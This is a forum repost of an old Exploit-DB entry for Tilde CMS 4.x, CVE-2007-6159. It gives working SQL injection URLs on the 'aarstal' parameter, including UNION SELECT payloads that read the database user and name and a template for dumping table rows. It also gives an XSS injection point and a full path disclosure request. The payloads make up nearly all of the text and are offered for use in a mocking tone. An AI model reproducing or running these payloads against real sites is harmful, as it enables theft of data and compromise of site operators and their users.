Exploit Tilde CMS 4.x - 'aarstal' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4662
Проверка EDB
  1. Пройдено
Автор
KINGOFTHEWORLD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-6159
Дата публикации
2007-11-26
Код:
---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

Original Here: http://www.inj3ct-it.org/exploit/tilde.txt

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd				

---------------------------------------------------------------
PoC

D'u need an explanation?!? i don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27

Little examples

Using user() and database() functions u can get some informations about the 
database...as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]
&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or u can get some recordes by the database like:

http://[target]/[tilde_path]/index.php?id=[id]
&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]
/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%
3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------

# milw0rm.com [2007-11-26]
 
Источник
www.exploit-db.com

Похожие темы